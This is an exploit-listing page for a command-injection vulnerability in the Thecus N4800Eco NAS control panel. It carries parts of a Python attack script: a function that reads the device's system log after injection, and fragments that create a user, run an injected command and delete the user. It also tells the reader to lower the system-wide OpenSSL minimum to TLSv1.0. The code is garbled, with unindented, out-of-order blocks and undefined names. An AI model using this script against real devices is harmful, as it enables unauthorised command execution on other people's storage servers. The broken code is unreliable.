Thecus n4800eco nas server control panel command injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-06-02 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Thecus n4800eco nas server control panel command injection is for educational purposes only; if you use it, you do so at your own risk!
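# To fix the SSL error that occurs when the script is started:
# 1- Open the /etc/ssl/openssl.cnf file.
#    At the bottom of the file:
#      [system_default_sect]
#      MinProtocol = TLSv1.2
#      CipherString = DEFAULT@SECLEVEL=2
# 2- Set the value of MinProtocol to TLSv1.0.
# Note: /etc/ssl/openssl.cnf is the system-wide OpenSSL configuration, so the
# lowered MinProtocol applies to every program on the host that loads it, not
# only to this script. Restore the original value when finished.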
def readResult(s, target):
    """Query the device's system log and print a slice of the reply.

    Sends a form POST to ``http://<target>/adm/setmain.php`` requesting one
    "sys" log entry starting at offset 0 (all levels), splits the response
    text on whitespace and prints tokens 5 through 7 of the result.

    Args:
        s: Object exposing ``post(url, data=..., verify=...)``; presumably a
            ``requests.Session`` -- confirm against the caller.
        target: Host (and optional port) concatenated directly into the URL.

    Returns:
        None. The output goes to stdout only.
    """
    # The URL scheme is plain http://, so the request travels unencrypted and
    # verify=False below has no certificate to skip on this call.
    endpoint = "".join(("http://", target, "/adm/setmain.php"))

    # "catagory" is spelled exactly as in the original request body; it is a
    # value sent to the device, not a typo to correct here.
    log_query = dict(
        fun="setlog",
        action="query",
        params='[{"start":0,"limit":1,"catagory":"sys","level":"all"}]',
    )

    response = s.post(endpoint, data=log_query, verify=False)
    tokens = response.text.split()

    print("[+] Reading system log...\n")
    # Only a fixed three-token window is shown; the original author notes the
    # range has to be changed to see the rest of the response.
    print(tokens[5:8])
if 'Local User remove succeeds' in delUserReq.text:
print('[+] %s command was executed successfully' % command)
else:
print('[-] %s command was not executed!' %command)
sys.exit(1)
readResult(s, target)
if 'Users and groups were created successfully.' in addUserReq.text:
print('[+] Users and groups were created successfully')
else:
print('[-] Users and groups were not created')
sys.exit(1)
delUser(s, target, command)